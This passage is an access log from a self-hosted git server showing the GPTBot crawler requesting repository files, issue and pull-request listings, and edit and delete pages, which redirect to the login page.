"/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" +[17/Feb/2026:18:38:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" +[17/Feb/2026:18:38:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" +[17/Feb/2026:18:38:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" +[17/Feb/2026:18:38:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" +[17/Feb/2026:18:38:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" +[17/Feb/2026:18:38:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" +[17/Feb/2026:18:38:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" +[17/Feb/2026:18:38:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" +[17/Feb/2026:18:38:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" +[17/Feb/2026:18:38:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" +[17/Feb/2026:18:38:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" +[17/Feb/2026:18:38:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" +[17/Feb/2026:18:38:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:38:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 11154] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:18:38:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=latest&state=closed&type=all" +[17/Feb/2026:18:38:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=latest&state=closed&type=all" +[17/Feb/2026:18:38:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=latest&state=closed&type=all" +[17/Feb/2026:18:38:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&sort=latest&state=all&type=all" +[17/Feb/2026:18:38:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:38:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:38:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:38:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:38:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:38:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:18:38:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:18:38:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:18:38:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:18:38:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:18:38:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 10092] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:18:38:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 1513] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:18:38:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 880569] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:18:38:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:18:38:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&sort=oldest&state=all&type=all" +[17/Feb/2026:18:38:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=oldest&state=open&type=all" +[17/Feb/2026:18:38:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=oldest&state=all&type=all" +[17/Feb/2026:18:38:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=open&type=all" +[17/Feb/2026:18:38:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=open&type=all" +[17/Feb/2026:18:38:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:38:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=open&type=all" +[17/Feb/2026:18:38:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:38:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=oldest&state=closed&type=all" +[17/Feb/2026:18:38:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:18:38:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429?files=PostgresMonitor" [Client 74.7.227.38] [Length 17079] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor" +[17/Feb/2026:18:38:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 71842] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:18:38:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11419] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/import%20sys.py" +[17/Feb/2026:18:38:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=nearduedate&state=open&type=all" +[17/Feb/2026:18:38:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastupdate&state=open&type=all" +[17/Feb/2026:18:38:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&sort=oldest&state=all&type=all" +[17/Feb/2026:18:39:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=open&type=all" +[17/Feb/2026:18:39:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=open&type=all" +[17/Feb/2026:18:39:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=oldest&state=closed&type=all" +[17/Feb/2026:18:39:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=open&type=all" +[17/Feb/2026:18:39:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=oldest&state=open&type=all" +[17/Feb/2026:18:39:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=farduedate&state=open&type=all" +[17/Feb/2026:18:39:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=open&type=all" +[17/Feb/2026:18:39:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=open&type=all" +[17/Feb/2026:18:39:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=open&type=all" +[17/Feb/2026:18:39:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:39:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 